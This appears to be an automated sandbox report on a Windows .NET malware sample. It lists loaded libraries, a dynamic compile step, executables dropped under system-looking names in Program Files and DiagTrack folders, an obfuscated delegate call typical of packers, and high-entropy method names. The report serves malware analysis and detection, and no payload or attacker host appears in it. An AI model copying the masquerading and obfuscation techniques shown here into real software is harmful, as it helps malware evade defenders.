                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: propsys.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: dlnashext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wpdshext.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: edputil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: netutils.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: slc.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: mscoree.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: version.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: wldp.dll
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDirectory created: C:\Program Files\Windows Multimedia Platform\dllhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeDirectory created: C:\Program Files\Windows Multimedia Platform\5940a34987c991Jump to behavior
                            Source: PlZA6b48MW.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: PlZA6b48MW.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: PlZA6b48MW.exeStatic file information: File size 1917440 > 1048576
                            Source: PlZA6b48MW.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1d3a00
                            Source: PlZA6b48MW.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.pdb source: PlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: em.pdb source: WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B342000.00000004.00000020.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: PlZA6b48MW.exe, CLZOU1nWue0Qdk97iqU.cs.Net Code: Type.GetTypeFromHandle(jglbD96jbP5TJFuG4Wy.QxnrBGMH3aW(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(jglbD96jbP5TJFuG4Wy.QxnrBGMH3aW(16777245)),Type.GetTypeFromHandle(jglbD96jbP5TJFuG4Wy.QxnrBGMH3aW(16777259))})
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9B884B7C push ss; retf 0_2_00007FFD9B884B7F
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9B884B2C pushad ; retf 0_2_00007FFD9B884B35
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9B883977 push ss; retf 0_2_00007FFD9B883986
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9BC7DFC2 push edi; ret 0_2_00007FFD9BC7DFC6
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 0_2_00007FFD9BC7E4C9 pushad ; ret 0_2_00007FFD9BC7E4CA
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 45_2_00007FFD9B894B7C push ss; retf 45_2_00007FFD9B894B7F
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 45_2_00007FFD9B894B2C pushad ; retf 45_2_00007FFD9B894B35
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 45_2_00007FFD9B893977 push ss; retf 45_2_00007FFD9B893986
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B8C68A8 pushad ; ret 47_2_00007FFD9B8C68AD
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B884B7C push ss; retf 47_2_00007FFD9B884B7F
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B884B2C pushad ; retf 47_2_00007FFD9B884B35
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B883977 push ss; retf 47_2_00007FFD9B883986
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B898EDD pushfd ; retf 47_2_00007FFD9B898EE3
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9B8919E6 push ecx; iretd 47_2_00007FFD9B8919EC
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 47_2_00007FFD9BC7A712 push FFFFFF86h; ret 47_2_00007FFD9BC7A714
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9B8A4B7C push ss; retf 56_2_00007FFD9B8A4B7F
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9B8A4B2C pushad ; retf 56_2_00007FFD9B8A4B35
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeCode function: 56_2_00007FFD9B8A3977 push ss; retf 56_2_00007FFD9B8A3986
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B8919E5 push ecx; iretd 59_2_00007FFD9B8919EC
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B898EDD pushfd ; retf 59_2_00007FFD9B898EE3
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B884B7C push ss; retf 59_2_00007FFD9B884B7F
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B884B2C pushad ; retf 59_2_00007FFD9B884B35
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9B883977 push ss; retf 59_2_00007FFD9B883986
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeCode function: 59_2_00007FFD9BC7A712 push FFFFFF86h; ret 59_2_00007FFD9BC7A714
                            Source: PlZA6b48MW.exeStatic PE information: section name: .text entropy: 7.542820283476374
                            Source: dllhost.exe.0.drStatic PE information: section name: .text entropy: 7.542820283476374
                            Source: WtHZilDMhVnOIkoIfPBLn.exe.0.drStatic PE information: section name: .text entropy: 7.542820283476374
                            Source: PlZA6b48MW.exe.0.drStatic PE information: section name: .text entropy: 7.542820283476374
                            Source: WtHZilDMhVnOIkoIfPBLn.exe0.0.drStatic PE information: section name: .text entropy: 7.542820283476374
                            Source: PlZA6b48MW.exe, -Module--aff84d19-f9b9-4ce6-be9f-a60f948a71b7-.csHigh entropy of concatenated method names: 'q04bc35cf85964aedbf8f5119c66dbc7b', 'wn4tL1rBiNu5p1Oq0SRZ', 'lWNt5mrB9I08SRpyMjZZ', 'MT5VkbrBQYADh6OZUP0o', 'KLGVFgrBceceZsQxvAGE'
                            Source: PlZA6b48MW.exe, Sp3K3HhGG65Aifr0Rw9.csHigh entropy of concatenated method names: 'P9X', 'cU4hwcy9rJ', 'RFKhZfHnTSB', 'imethod_0', 'YmUhngnoue', 'umtjZah0lrbbtS2DecRe', 'JAeeFRh0GHiOa7hg8YhF', 'E1RCuuh0eIO502qBI8Bu', 'EcAqyph0SgpDZuQTCqrK', 'Wwv3LXh0HkSRgQIq9whg'
                            Source: PlZA6b48MW.exe, gV75Ky6F834fBkGIXxg.csHigh entropy of concatenated method names: 'zuih1gLZ8x9', 'mLuh1Nx5lU5', 'w71h1V8adGx', 'gp0h17v6uVW', 'kaNh1yn3xah', 'rGGh1CoiMcR', 'PwWh1qS5iCQ', 'hAeoBG0xu5', 'bydh1FNE90s', 'Ju1h1KcWswx'
                            Source: PlZA6b48MW.exe, QiPZKBN7TDpQutMP0ru.csHigh entropy of concatenated method names: 'Close', 'qL6', 'RTJNCc9vC2', 'YPtNqpv0ZG', 'xOoNFrrNRJ', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                            Source: PlZA6b48MW.exe, gkwabDDEBU6okIhEZIi.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'B5JDQutSTB', 'ij8DciqPtI', 'Dispose', 'D31', 'wNK'
                            Source: PlZA6b48MW.exe, KIHUNPsRIO3J2L0joD7.csHigh entropy of concatenated method names: 'j2FsvUKMdj', 'W72sjmLECH', 'oWjst8qUPo', 'eq9splmuCT', 'FCpsTpy42K', 'zorMtghQU3p2bY78Pbn0', 'pI8bWAhQZDcUPcU1DMpB', 'n5IZkDhQuBS9yZQAIekd', 'gUg40QhQR8Y3ZH2VcTwh', 'IDt4pGhQPduD6KGT6Y1o'
                            Source: PlZA6b48MW.exe, pdnLNArOhieiXRYRglm.csHigh entropy of concatenated method names: 'YJVr8WFORX', 'uxtr2ZwvXW', 'IMpss8hA863MQPaRx0vf', 'HsXBFQhAFAu7d2JE6Jhm', 'WoB0XuhAKr46m1FIVSPG', 'pwcqhYhA2GUnf43pL11j', 'Ihorch0gqM', 'BZbJtOhAcIAsGybG77NZ', 'lbGC6ShAibrqID5RMeix', 'lyiysBhAMCggUuk81uqc'
                            Source: PlZA6b48MW.exe, DKS3IIAocC4LhqoT70h.csHigh entropy of concatenated method names: 'xxr5fnK6SG', 'eBL5huGUu5', 'QQQ5rZhejo', 'P0k5YgtEho', 'AT15xR2g4g', 'hBI5BdcHNc', 'EYegm1hcHrl5rERipcje', 'yFBALshcwA2CWuEvsAnx', 'FkbPbThcnU16tESUAT0I', 'XFAy8Ehc37WOQ6WFiCpu'
                            Source: PlZA6b48MW.exe, S7euLc5KC8NuINe9SSH.csHigh entropy of concatenated method names: 'RD152OLoIh', 'x0C5ErdAQ7', 'oE75MDZJ9V', 'GGd5QPQyxu', 'Rt75c1OoCu', 'WEa5iLPCy7', 'X6g592RUD6', 'nGw5eo8d1X', 'zWx5SXqiq6', 'sjN5l2cAtB'
                            Source: PlZA6b48MW.exe, uOCBqMZTSFHQby1CeBH.csHigh entropy of concatenated method names: 'NVQZIg9kZ4', 'fxUIPThV5ZYVjO4LjgsG', 'CgSmBNhV0AfNO7aF1aIC', 'HklolThVANgoKXQ8lpF1', 'TJZP2ghVXYuMlTWmggDY', 'Un6ZabUHLB', 'W8jIUchVDYfHR3FIwVAi', 'K7shBVhVkHcEQ2exxC65', 'icepishV4pPehW4A9vBK', 'bIGqkAhVm2i0WWoEvURQ'
                            Source: PlZA6b48MW.exe, nsXNYfqMGshyYsws5AZ.csHigh entropy of concatenated method names: 'XRehZD4rikO', 'Rivqc7yvyR', 'VYjqiY0eUj', 'hvlq95LSOb', 'ITVZDEhGO4HcVCx1jRKU', 'vSCp81hGgDvtaKsuyDYE', 'qRlhnrhGNLu1mUSe4kFm', 'UyAdEQhGVlTXc5hJKAZi', 'Y9y2CZhG7s9M9peWtvlb', 'yUUW5PhGy93TIYl3qd8P'
                            Source: PlZA6b48MW.exe, SJiMW66aKrIS9EDErZP.csHigh entropy of concatenated method names: 'CYN65seucm', 'qGL6XtmAW4', 'R8c6OEh3gB', 'icO6gRRF2K', 'CUZ6NgiF76', 'yiH6V9noJg', 'OIT67HyoSZ', 'QXL6yPLc1m', 'p2s6CBvjoD', 'y6w6qsLmXI'
                            Source: PlZA6b48MW.exe, dDG7K0gJCjc3mp3Pd1J.csHigh entropy of concatenated method names: 'oi0Nj4EWrQ', 'VFl9u1heQE92r2K7w3yj', 'dylmC4hecgjk5MnVDrKm', 'kt5', 'FTug4ob1Q6', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'Suz'
                            Source: PlZA6b48MW.exe, xhxvq0BF1LaiFZHaMvt.csHigh entropy of concatenated method names: 'q64', 'P9X', 'wF2hxjHDfZK', 'vmethod_0', 'DNHhZ1cqSkv', 'imethod_0', 'vS2YIphOS1PPOKCaLLTq', 'GgBGvjhOlRgnsg54SgRI', 'nWysW1hOGJPkVTW9Bmwp', 'bJwYkhhOH7mf2fGmD2Ot'
                            Source: PlZA6b48MW.exe, cpryfPy7KESaEK7gpxW.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'Oiox1GhlVL2p55EmioYM', 'Krinpkhlg1FRqeUfOeIb', 'XqRxdWhlNwAUYrOQ8yA4'
                            Source: PlZA6b48MW.exe, Ii932KVCjshBqLr8EL8.csHigh entropy of concatenated method names: 'q13', 'Sw1', 'method_0', 'BlLVFphWKr', 'atiVK1kIAs', 'IC3V8YN03o', 'W1SV2rZsAt', 'jWXVELsDKR', 'PHRVMqdYKa', 'o6yUt1hSc3JIaadlLCVm'
                            Source: PlZA6b48MW.exe, ciCQHiJRThKTCZxa0j5.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'KMchZbbv4pp', 'YtPhZ4WNgSK', 'FofFAeh8Ht7GEMRc8P9B', 'abu7qPh8wHGwCZFfNYBg', 'R024Dah8n1cys2Z4FqjU', 'uF0HuMh83IJNk8IUYtdL', 'NKrYDRh8647P3P8xBidB', 'iGPuEfh8oUxCp0POA9IF'
                            Source: PlZA6b48MW.exe, l6otREYsmZ2gxUWkVhn.csHigh entropy of concatenated method names: 'hIBY2m4uSr', 'lBnYEfM9bO', 'M2sYMgjKTa', 'pgf48Ah5cg7cOv0ycc0c', 'm8conRh5iTJVCbgBSQ8V', 'OZ1RHoh5M6ohFkyyEnQu', 'Tx1sJ9h5Qm9gVKnJaQel', 'PSEYAiPuQy', 'ALwY5pquRU', 'vs1YXMyvFV'
                            Source: PlZA6b48MW.exe, EaqGaZbvlyf7CW05WTd.csHigh entropy of concatenated method names: 'UaMmhaxWIp', 'F43kjLhEkLU7kD2vhu07', 'IN67KGhEmKOW2i1Zf9s3', 'D1RX9OhED3K7L8AlXjvm', 'F9F1vGhEsDJt4iGSftd0', 'Flmbtw8YqI', 'a1Bbp4RBAJ', 'bghbTbxTBC', 'yPsbWqh2QA', 'EYlbaHawHW'
                            Source: PlZA6b48MW.exe, OlkugiBV7VI4empo3PW.csHigh entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'x74hxRCcsIo', 'tgOBy0Mjdd', 'imethod_0', 'HpQ0pQhOE1lfIXHp8cKA', 'v7R11YhOMKAZHdrLO6nX', 'suD0LPhOQFIJVHUJBCnj', 'I1ZUHphOcurIi5nGruNN'
                            Source: PlZA6b48MW.exe, ClnNmYBphXGpCxrerps.csHigh entropy of concatenated method names: 'wmOB0OdoV2', 'giRBAb9kG9', 'lknB56LmJF', 'tbvFZUhO8EcX47aENpeN', 'OdgqwThOFL01TYvjWoYq', 'WPksj5hOK7aqqDNoap5c', 'GbNBmSyYCC', 'CqwBDGjdGq', 'nib8f7hOCRNPA8TZgX00', 'H5VoY8hO7NmTCBp9AP1d'
                            Source: PlZA6b48MW.exe, iw74DR5vUUHdHRpUrIe.csHigh entropy of concatenated method names: 'HuL5tpY1xh', 'albVi7hiUR6dhWGnxuUP', 'L0eDXVhiZqDurX9WIldb', 'Vsh70qhiuvRNbm8w2NJy', 'dadTWBhiRECs4IgdBe9S', 'I0D4QWhiPBmFshqSVJYe', 'zAvCWxhivILN7J7vuHAf', 'J2FOmZhijR9swXHhYXla'
                            Source: PlZA6b48MW.exe, seQr0WmUlB966jpp0fU.csHigh entropy of concatenated method names: 'ITDmOoFIjw', 'w0KmPAp8p3', 'ThGmvkSP3N', 'dFxmjtN8Ro', 'GokmteC0A0', 'Y5nmpAAsgH', 'SInmTYDOmo', 'S2SmW0FgJ3', 'oEMmaqK3xO', 'ilhmL1Mjdb'
                            Source: PlZA6b48MW.exe, oVVDlcI9V4mnMiLtdsl.csHigh entropy of concatenated method names: 'BIdhZTE4tFH', 'pTqISZbAWN', 'uguhZWZsLAc', 'Ybod7Hh8soStOnRoHOEY', 'tQ7PA7h80yBIEr3PMjOi', 'M1yaX8h8Djt4cd1gKtjh', 'OkyjWvh8kJGmWHEjos11', 'YnYqInh8AtEgECJ43wRD', 'Sg9iCTh85xovEIdQGdTq', 'K6bqwph8XZAd9pHe7ev4'
                            Source: PlZA6b48MW.exe, Prly1LLAErxHjXeEy1p.csHigh entropy of concatenated method names: 'rfWLyLiF7U', 'csomDqhKBkIpMgDbqQ7S', 'KwB6JohKYc9UTV8YvfxS', 'j2bZ93hKxskuGMBY3Nss', 'pvNE6ihK14PIG8OWiVqS', 'k0TLXpLl4G', 'XEcLOXSqrq', 'OQbLgRg6ZP', 'SFyHmehKh58dH6024vUu', 'eEkvINhFzcU11i4ZY7Ck'
                            Source: PlZA6b48MW.exe, aZtyONsOCW0rOnxecG1.csHigh entropy of concatenated method names: 'method_0', 'OlKsNN4fhT', 'vV1sVpk3wa', 'mSts7HNpVH', 'XhvsyffEbW', 'QZ5sCvg15H', 'x6Zsqx41vi', 'PAqAj0hQJ6NWBIhIraWM', 'kag3HkhQLGyMEwUl50IW', 'BjqvA9hQI2aJyBRC3SYZ'
                            Source: PlZA6b48MW.exe, mCXwogBEHVRxvaGusPW.csHigh entropy of concatenated method names: 'QuKB91HH60', 'phBmGvhgYUroI5EG7WTd', 'jK0vHchgxkpYN2iPdRUx', 'yjUsdQhgBEEOqV9bb26A', 'GqAXcbhg1MXSexhV5GHb', 'U1J', 'P9X', 'ULBhxpevyQo', 'JpjhxTJE5IR', 'JwBhZd3AXk8'
                            Source: PlZA6b48MW.exe, nyPGJIurtPbp3LS0lSJ.csHigh entropy of concatenated method names: 'FIfuxcyynO', 'xPauBfh1Be', 'Rglu1WiOA1', 'gU5udxtuOE', 'XSKuZv3WGG', 'vLiuunbqyb', 'EvpuUUvQtb', 'I6WuRgwHa9', 'RS2uPEPeaf', 'ShbuvaZjML'
                            Source: PlZA6b48MW.exe, m3PMx1t4ph6iv6Kn699.csHigh entropy of concatenated method names: 'xFYLvAOTc3', 'Sq7LjyMhm9', 'y7P15lhFcR7bwaBwK8kG', 'yKBRrAhFMFaRyAAhJE9U', 'BIo8BZhFQ94eEUPd1Zu3', 'm6nq1ohFimAHE5HgOY3O', 'eayLLNRQQM', 'mV5oxshFlp3o8eNrJ360', 'OHjmA3hFe5tjIP5ELS1r', 'jtOPFKhFS9SJwbXHvM1J'
                            Source: PlZA6b48MW.exe, JGO9k1NeBd7JBASZucf.csHigh entropy of concatenated method names: 'xYyNlVf0Fm', 'k6r', 'ueK', 'QH3', 'ifbNGa1kt0', 'Flush', 'IMYNHa4jH0', 'ePANwD25Rx', 'Write', 'FRENn0N3LE'
                            Source: PlZA6b48MW.exe, BxQFMRK7CLoXRgc7fah.csHigh entropy of concatenated method names: 'ibbTDXhHodfpadWq3qZc', 'mRy3c9hH3xRM21lngaAy', 'i3wPoihH6jLeA4AA6DMQ', 'nhiTTUhHGCp5AfvOJqEZ', 'VQHf57hHH8lwWSIr0E0e', 'i3qGUmhHwAUDWtr9bytn', 'CBbPIEhHS7DInClNi8CG', 'koLvSQhHlane9CxNPvuK'
                            Source: PlZA6b48MW.exe, tugKRRwOct3UMISjGK5.csHigh entropy of concatenated method names: 'PO8wNPffJq', 'rc5wV7Y78B', 'yS1w7fknVv', 'Fd1wy2yRmw', 'Dispose', 'TqiVSsh301AwOH3YNc02', 'PPn2jgh3khwlMtFqZMGK', 'kBi9Evh3s2Jned87DH6R', 'fQqQoXh3AQGUHRoSFm5L', 'Cgp3uwh3530kIniKo4Hh'
                            Source: PlZA6b48MW.exe, uWCNo7dhZhbNmIxwSXo.csHigh entropy of concatenated method names: 'UgadYW06p6', 'JU8dx5GuCG', 'OZqdBxrWCn', 's4xXpIhNZVRYci9PqQne', 'bP7taghNuuAIUBTyVOT0', 'SYKNk3hNUEukiV3wA7Ve', 'zOaswMhNR0w1Wh0BtpDM', 'if95FshNPmNZ0HJVRShb', 'kR5mGmhNvT5tSaQuu27i'
                            Source: PlZA6b48MW.exe, jU4ILWFOS9Sr6Soyq88.csHigh entropy of concatenated method names: 'wtjFNofhMS', 'ngCFVGtTQ9', 'bPVF7iTCIa', 'cNNFyihThS', 's0TFCb7DNx', 'x3AFqcFLn9', 'wAoFFjmq0A', 'V5fFKXdPYG', 'lMLF82SKoN', 'm6WF2CDDJ6'
                            Source: PlZA6b48MW.exe, mlp7ltZ0d4RfMQ2Qa4Z.csHigh entropy of concatenated method names: 'rmPZ5dUJur', 'rB4ZX1FJGu', 'fv1ZOHVJFb', 'GWcZga2qrs', 'yuuZNfqOEn', 'RDJZV0xDuF', 'u2m3nJhVQT7hNhlBXn5S', 'A484gwhVcExducryFYLE', 'FoosNShVixjVcdyn7wL2', 'Ohpsj8hV9J7YAA6LlCWj'
                            Source: PlZA6b48MW.exe, UjgJZawvRRpM8cgVyLG.csHigh entropy of concatenated method names: 'sBGwpYN2un', 'rHUwLEb86g', 'OBmwbQG038', 'lyLw4byx42', 'ixiwmT5Gsf', 'Nq7wDROZ1U', 'iNhwkOpRrY', 'DCkwsZ6QJ8', 'Dispose', 'J043Tyh3LVe58LqO5icW'
                            Source: PlZA6b48MW.exe, Q10lSjGC86eXLbC2R0O.csHigh entropy of concatenated method names: 'FMDhZsFvcQk', 'V92h1kq1qn7', 'fsykgfhnpu5AkUlPp1tD', 'iJMuTihnTZEGx63QnPH9', 'ERdHPZhnWM7URpFyjXeJ', 's2Vp21hnJCeGk0kjyRX1', 'S0vqkmhnLIPx54wymwZ6', 'qXhIuGhnI4AI8VbkbXUY', 'NRp6LohnbAsNCqnl1vRj', 'imethod_0'
                            Source: PlZA6b48MW.exe, SSolQudLn6NIVyXlx0W.csHigh entropy of concatenated method names: 'kXndAs8UYj', 'Br0OgNhN82lHgdjxmDwx', 'OwrYOxhN2OiNUf946PR7', 'GxjlTLhNF8nc4Fd8mhFZ', 'x1pM82hNKsGvmjCoHia8', 'eiARlChNECbyUhWDLQDh', 'IMIdJN9nUL', 'ioydbiIKRZ', 'w1bd4vvVOV', 'zhUdm92C9T'
                            Source: PlZA6b48MW.exe, kfJEYYVee4gZNsUOHi4.csHigh entropy of concatenated method names: 'a6wCDJhldDthJ2cPRBZr', 'GxliE3hlBmIJNJe6MdlN', 'JVItlphl1oBJ4IckAkHi', 'TFYbl0hlZZ9MGni49MLc', 'hfJVl8fSlA', 'Mh9', 'method_0', 'cN7VGnmXnO', 'wT5VHmHG4T', 'bRjVwTfqfg'
                            Source: PlZA6b48MW.exe, KaMDsDXM9HfMJXPf5UX.csHigh entropy of concatenated method names: 'fygXcrfyyl', 'MGsXiWIqN8', 'g82X9YlCQK', 'wWLXeOfQM6', 'IYpXS0LF2e', 'REFQEjh98dRR2n91ve2K', 'NaZ004h92f5nkhrUDMli', 'VIBbOvh9FKR2sqWiAfG7', 'DA1OgEh9KoJu25iu2XQQ', 'xrZ6n1h9ElskTH5tndGn'
                            Source: PlZA6b48MW.exe, zNyyNo0YCaEbDg9UEQ6.csHigh entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'h3Y0BK5WHI', 'Write', 'hJk01QT9C4', 'Eei0dAN9Q7', 'Flush', 'vl7'
                            Source: PlZA6b48MW.exe, TXMJieIjEMbyha4HPsc.csHigh entropy of concatenated method names: 'hrWIIrtgmm', 'SDbv9whKw8psWRqa9O4y', 'e887fUhKGnevIgddTJtW', 'AKxrNthKHuKqn8EGqIVA', 'HK7uSehKnvwDfaarLg2r', 'MAsIp010AB', 'JEkbFhhKih9SE0LFK9wD', 'I1KWTuhKQ6IELWOg39lK', 'UKRZXvhKcH8oxPTq9SyF', 'TxcBN2hK9iNGj4PsQ0aw'
                            Source: PlZA6b48MW.exe, QGoMLo1VnK4RPYLP3lQ.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'JrIhZUOc9os', 'G1shxhqk3e7', 'vo6lQghgQ3bncrK2ud15', 'tymlYIhgciF4B7Ippves', 'ejnIsBhgitKaJj92LVHf'
                            Source: PlZA6b48MW.exe, r8gQLjJpSE4PP8aHIUv.csHigh entropy of concatenated method names: 'th9CYxh2LMKc0LOlyZ2l', 'rRoANVh2IQIef6xTKG0G', 'VsbbdIh2Wb9Gk5xoTeOg', 'fLenpjh2aPQDL2U0P56W', 'method_0', 'method_1', 'JjNJWsL1VL', 'OTNJaxvdKC', 'iEgJLIGC7N', 'mEJJINwwRx'
